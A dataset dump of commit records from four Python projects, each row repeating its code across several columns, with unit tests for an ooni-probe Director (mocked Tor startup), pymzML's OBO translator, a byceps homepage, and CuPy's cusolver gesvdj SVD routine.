commit
stringlengths 40
40
| old_file
stringlengths 4
118
| new_file
stringlengths 4
118
| old_contents
stringlengths 0
2.94k
| new_contents
stringlengths 1
4.43k
| subject
stringlengths 15
444
| message
stringlengths 16
3.45k
| lang
stringclasses 1
value | license
stringclasses 13
values | repos
stringlengths 5
43.2k
| prompt
stringlengths 17
4.58k
| response
stringlengths 1
4.43k
| prompt_tagged
stringlengths 58
4.62k
| response_tagged
stringlengths 1
4.43k
| text
stringlengths 132
7.29k
| text_tagged
stringlengths 173
7.33k
|
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
307918596d4ec8ab1bbd36c3a7860d31d8849f71
|
ooni/tests/test_director.py
|
ooni/tests/test_director.py
|
from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
Add some unittests for the director.
|
Add some unittests for the director.
|
Python
|
bsd-2-clause
|
0xPoly/ooni-probe,juga0/ooni-probe,juga0/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,juga0/ooni-probe,0xPoly/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe,Karthikeyan-kkk/ooni-probe,Karthikeyan-kkk/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,lordappsec/ooni-probe,kdmurray91/ooni-probe,Karthikeyan-kkk/ooni-probe,juga0/ooni-probe,lordappsec/ooni-probe,0xPoly/ooni-probe
|
Add some unittests for the director.
|
from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
<commit_before><commit_msg>Add some unittests for the director.<commit_after>
|
from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
Add some unittests for the director.from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
<commit_before><commit_msg>Add some unittests for the director.<commit_after>from mock import patch, MagicMock
from ooni.settings import config
from ooni.director import Director
from twisted.internet import defer
from twisted.trial import unittest
class TestDirector(unittest.TestCase):
def test_get_net_tests(self):
director = Director()
nettests = director.getNetTests()
assert 'http_requests' in nettests
assert 'dnsconsistency' in nettests
assert 'http_header_field_manipulation' in nettests
assert 'traceroute' in nettests
def test_start_tor(self):
from txtorcon import TorControlProtocol
proto = MagicMock()
proto.tor_protocol = TorControlProtocol()
mock_TorState = MagicMock()
# We use the instance of mock_TorState so that the mock caching will
# return the same instance when TorState is created.
mts = mock_TorState()
mts.protocol.get_conf = lambda x: defer.succeed({'SocksPort': '4242'})
mts.post_bootstrap = defer.succeed(mts)
# Set the tor_protocol to be already fired
state = MagicMock()
proto.tor_protocol.post_bootstrap = defer.succeed(state)
mock_launch_tor = MagicMock()
mock_launch_tor.return_value = defer.succeed(proto)
@patch('ooni.director.TorState', mock_TorState)
@patch('ooni.director.launch_tor', mock_launch_tor)
@defer.inlineCallbacks
def director_start_tor():
director = Director()
yield director.startTor()
assert config.tor.socks_port == 4242
assert config.tor.control_port == 4242
config.tor_state = None
return director_start_tor()
|
|
baaaaf514f516d2c7bdbe4d0679f578eb0dc7a11
|
test/test_obo.py
|
test/test_obo.py
|
import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
# Lookup by definition and get a name
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
Add unit tests for OBO translator
|
Add unit tests for OBO translator
|
Python
|
mit
|
StSchulze/pymzML,pymzml/pymzML,StSchulze/pymzML,pymzml/pymzML
|
Add unit tests for OBO translator
|
import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
# Lookup by definition and get a name
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add unit tests for OBO translator<commit_after>
|
import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
# Lookup by definition and get a name
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
Add unit tests for OBO translatorimport unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
# Lookup by definition and get a name
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
<commit_before><commit_msg>Add unit tests for OBO translator<commit_after>import unittest
import os
import pymzml.obo
class TestObo(unittest.TestCase):
def test_valid_obo(self):
# Test features of the OBO that differ for each version
obos = {
version: pymzml.obo.oboTranslator(version)
for version in ('1.18.2', '2.0.0', '2.01.0')
}
# Changes from 1.18.2 to 2.0.0
self.assertEqual(
obos['1.18.2']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Ontology'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
'Proteomics Standards Initiative Mass Spectrometry Vocabularies'
)
self.assertEqual(
obos['2.0.0']['MS:0000000'],
obos['2.01.0']['MS:0000000'],
)
# Changes from 2.0.0 to 2.01.0
self.assertEqual(obos['1.18.2']['MS:1000854'], None)
self.assertEqual(obos['2.0.0']['MS:1000854'], None)
self.assertEqual(obos['2.01.0']['MS:1000854'], 'LTQ XL')
def test_most_recent_obo(self):
obo = pymzml.obo.oboTranslator()
self.assertEqual(obo.version, None)
# Changes only implemented in 3.78.0
self.assertEqual(
obo[obo['MS:1000130']]['is_a'],
'MS:1000808 ! chromatogram attribute',
)
def test_invalid_obo(self):
with self.assertRaises(Exception):
pymzml.obo.oboTranslator('1.1.1')
def test_getitem(self):
obo = pymzml.obo.oboTranslator('3.78.0')
data = {
'id': 'MS:1002569',
'name': 'ProteomeDiscoverer:Number of Spectra Processed At Once',
'def': '"Number of spectra processed at once in a ProteomeDiscoverer search." [PSI:PI]',
'xref': 'value-type:xsd\:int "The allowed value-type for this CV term."',
'is_a': 'MS:1002101 ! ProteomeDiscoverer input parameter',
}
# Lookup by ID and get name
self.assertEqual(obo[data['id']], data['name'])
# Lookup by name and get a dict
self.assertEqual(obo[data['name']], data)
# Nested lookup
self.assertEqual(obo[obo[data['id']]], data)
# Lookup by definition and get a name
self.assertEqual(obo[data['def']], data)
if __name__ == '__main__':
unittest.main()
|
|
9a45596d95d1bc568e0551a52abbde4a63f26393
|
tests/blueprints/test_homepage.py
|
tests/blueprints/test_homepage.py
|
"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
Test homepage (even though it currently 404's)
|
Test homepage (even though it currently 404's)
|
Python
|
bsd-3-clause
|
homeworkprod/byceps,homeworkprod/byceps,m-ober/byceps,m-ober/byceps,homeworkprod/byceps,m-ober/byceps
|
Test homepage (even though it currently 404's)
|
"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
<commit_before><commit_msg>Test homepage (even though it currently 404's)<commit_after>
|
"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
Test homepage (even though it currently 404's)"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
<commit_before><commit_msg>Test homepage (even though it currently 404's)<commit_after>"""
:Copyright: 2006-2019 Jochen Kupperschmidt
:License: Modified BSD, see LICENSE for details.
"""
from tests.base import AbstractAppTestCase
from tests.helpers import create_brand, create_party, create_site, \
create_user, http_client
class HomePageTest(AbstractAppTestCase):
def setUp(self):
super().setUp()
brand = create_brand()
party = create_party(brand.id)
create_site(party.id)
def test_homepage(self):
with http_client(self.app) as client:
response = client.get('/')
# By default, nothing is mounted on `/`, but at least check that
# the application boots up and doesn't return a server error.
assert response.status_code == 404
|
|
9dceaaebdd2a63732fb1a9284fa29c4cc71c3e2d
|
tests/cupy_tests/test_cusolver.py
|
tests/cupy_tests/test_cusolver.py
|
import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
Add unit tests for gesvdj
|
Add unit tests for gesvdj
|
Python
|
mit
|
cupy/cupy,cupy/cupy,cupy/cupy,cupy/cupy
|
Add unit tests for gesvdj
|
import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
<commit_before><commit_msg>Add unit tests for gesvdj<commit_after>
|
import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
Add unit tests for gesvdjimport unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
<commit_before><commit_msg>Add unit tests for gesvdj<commit_after>import unittest
import numpy
import cupy
from cupy import testing
from cupy import cusolver
@testing.parameterize(*testing.product({
'dtype': [numpy.float32, numpy.float64, numpy.complex64, numpy.complex128],
'shape': [(5, 3), (4, 4), (3, 5)],
'order': ['C', 'F'],
'full_matrices': [True, False],
'overwrite_a': [True, False],
}))
class TestGesvdj(unittest.TestCase):
def setUp(self):
m, n = self.shape
if self.dtype == numpy.complex64:
a_real = numpy.random.random((m, n)).astype(numpy.float32)
a_imag = numpy.random.random((m, n)).astype(numpy.float32)
self.a = a_real + 1.j * a_imag
elif self.dtype == numpy.complex128:
a_real = numpy.random.random((m, n)).astype(numpy.float64)
a_imag = numpy.random.random((m, n)).astype(numpy.float64)
self.a = a_real + 1.j * a_imag
else:
self.a = numpy.random.random((m, n)).astype(self.dtype)
def test_gesvdj(self):
a = cupy.array(self.a, order=self.order)
u, s, v = cusolver.gesvdj(a, full_matrices=self.full_matrices,
overwrite_a=self.overwrite_a)
m, n = self.shape
mn = min(m, n)
if self.full_matrices:
sigma = numpy.zeros((m, n), dtype=self.dtype)
for i in range(mn):
sigma[i][i] = s[i]
sigma = cupy.array(sigma)
else:
sigma = cupy.diag(s)
if self.dtype in (numpy.complex64, numpy.complex128):
vh = v.T.conjugate()
else:
vh = v.T
aa = cupy.matmul(cupy.matmul(u, sigma), vh)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(aa, self.a, decimal=decimal)
def test_gesvdj_no_uv(self):
a = cupy.array(self.a, order=self.order)
s = cusolver.gesvdj(a, full_matrices=self.full_matrices,
compute_uv=False, overwrite_a=self.overwrite_a)
expect = numpy.linalg.svd(self.a, full_matrices=self.full_matrices,
compute_uv=False)
if self.dtype in (numpy.float32, numpy.complex64):
decimal = 5
else:
decimal = 10
testing.assert_array_almost_equal(s, expect, decimal=decimal)
|
